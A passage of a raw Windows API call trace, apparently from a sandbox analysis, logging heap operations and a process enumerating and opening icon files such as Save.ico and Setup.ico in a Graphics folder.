(in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0062.106] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0062.106] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0062.106] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0062.106] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0062.106] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0062.106] AreFileApisANSI () returned 1 [0062.106] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 43 [0062.106] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x56) returned 0x67540 [0062.106] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x67540, cchWideChar=43 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\Rotate8.ico") returned 43 [0062.106] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate8.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate8.ico"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x37e)) returned 1 [0062.106] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x67540 | out: hHeap=0x20000) returned 1 [0062.106] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0062.106] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0062.106] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0062.106] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.106] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.106] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x47e, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="Save.ico", cAlternateFileName="")) returned 1 [0062.106] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0062.106] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0062.106] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0062.106] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0062.106] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0062.106] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0062.106] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0062.106] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0062.106] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0062.106] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0062.106] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0062.106] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0062.107] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0062.107] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0062.107] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0062.107] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0062.107] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0062.107] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0062.107] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0062.107] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x71758 [0062.107] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0062.107] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0062.107] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d4d0 [0062.107] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0062.107] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.107] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.107] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.107] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.107] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d4d0 | out: hHeap=0x20000) returned 1 [0062.107] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0062.107] AreFileApisANSI () returned 1 [0062.107] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\Save.ico", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\Graphics\\Save.ico", lpUsedDefaultChar=0x0) returned 40 [0062.107] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0062.107] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.107] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.107] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0062.107] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0062.107] AreFileApisANSI () returned 1 [0062.107] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e180, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 40 [0062.107] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0062.107] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e180, cbMultiByte=-1, lpWideCharStr=0x6d688, cchWideChar=40 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\Save.ico") returned 40 [0062.107] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Save.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\save.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0062.108] GetFileType (hFile=0x41c) returned 0x1 [0062.108] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0062.108] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0062.108] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0062.108] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0062.108] CloseHandle (hObject=0x41c) returned 1 [0062.108] AreFileApisANSI () returned 1 [0062.108] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e180, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 40 [0062.108] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cce8 [0062.109] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e180, cbMultiByte=-1, lpWideCharStr=0x6cce8, cchWideChar=40 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\Save.ico") returned 40 [0062.109] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Save.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\save.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0062.109] GetFileType (hFile=0x41c) returned 0x1 [0062.109] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cce8 | out: hHeap=0x20000) returned 1 [0062.109] CloseHandle (hObject=0x41c) returned 1 [0062.109] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1f0 [0062.109] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0062.109] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0062.109] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0062.109] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0062.109] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0062.109] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1f0 | out: hHeap=0x20000) returned 1 [0062.109] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0062.109] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0062.109] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0062.109] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0062.109] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0062.109] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0062.109] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0062.109] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0062.109] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0062.109] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0062.109] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0062.109] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0062.109] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0062.109] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0062.109] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0062.110] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0062.110] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0062.110] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0062.110] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0062.110] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0062.110] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0062.110] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0062.110] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0062.110] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0062.110] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0062.110] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0062.110] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0062.110] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0062.110] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0062.110] AreFileApisANSI () returned 1 [0062.110] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e180, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 40 [0062.110] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6ce48 [0062.110] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e180, cbMultiByte=-1, lpWideCharStr=0x6ce48, cchWideChar=40 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\Save.ico") returned 40 [0062.110] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\Graphics\\Save.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\save.ico"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x47e)) returned 1 [0062.110] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ce48 | out: hHeap=0x20000) returned 1 [0062.110] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0062.110] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0062.110] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0062.110] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.110] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.110] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x8f66, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="Setup.ico", cAlternateFileName="")) returned 1 [0062.110] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0062.110] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0062.110] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0062.110] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0062.110] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0062.110] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0062.110] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0062.110] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0062.110] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0062.110] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0062.111] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0062.111] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0062.111] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0062.111] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0062.111] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0062.111] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0062.111] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0062.111] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0062.111] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0062.111] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x716f0 [0062.111] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0062.111] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0062.111] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0062.111] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x716f0 | out: hHeap=0x20000) returned 1 [0062.111] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.111] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.111] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.111] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.111] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0062.111] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0062.111] AreFileApisANSI () returned 1 [0062.111] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\Setup.ico", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\Graphics\\Setup.ico", lpUsedDefaultChar=0x0) returned 41 [0062.111] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0062.111] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.111] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.111] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0062.111] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0062.111] AreFileApisANSI () returned 1 [0062.111] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e068, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 41 [0062.111] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x52) returned 0x67540 [0062.111] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e068, cbMultiByte=-1, lpWideCharStr=0x67540, cchWideChar=41 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\Setup.ico") returned 41 [0062.112] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Setup.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\setup.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0062.148] GetFileType (hFile=0x41c) returned 0x1 [0062.148] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x67540 | out: hHeap=0x20000) returned 1 [0062.148] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0062.148] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0062.148] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0062.149] CloseHandle (hObject=0x41c) returned 1 [0062.149] AreFileApisANSI () returned 1 [0062.149] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e068, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 41 [0062.149] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x52) returned 0x67a20 [0062.149] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e068, cbMultiByte=-1, lpWideCharStr=0x67a20, cchWideChar=41 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\Setup.ico") returned 41 [0062.149] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Setup.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\setup.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0062.149] GetFileType (hFile=0x41c) returned 0x1 [0062.149] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x67a20 | out: hHeap=0x20000) returned 1 [0062.149] CloseHandle (hObject=0x41c) returned 1 [0062.149] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0062.149] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0062.149] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0062.149] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1f0 [0062.149] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0062.149] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0062.149] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0062.149] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0062.149] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0062.149] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0062.149] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0062.150] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0062.150] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0062.150] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1f0 | out: hHeap=0x20000) returned 1 [0062.150] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0062.150] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0062.150] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0062.150] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0062.150] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0062.150] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0062.150] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0062.150] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0062.150] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0062.150] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0062.150] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0062.150] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0062.150] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0062.150] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0062.150] HeapFree (in: hHeap=0x20000, dwFlags=0x0, 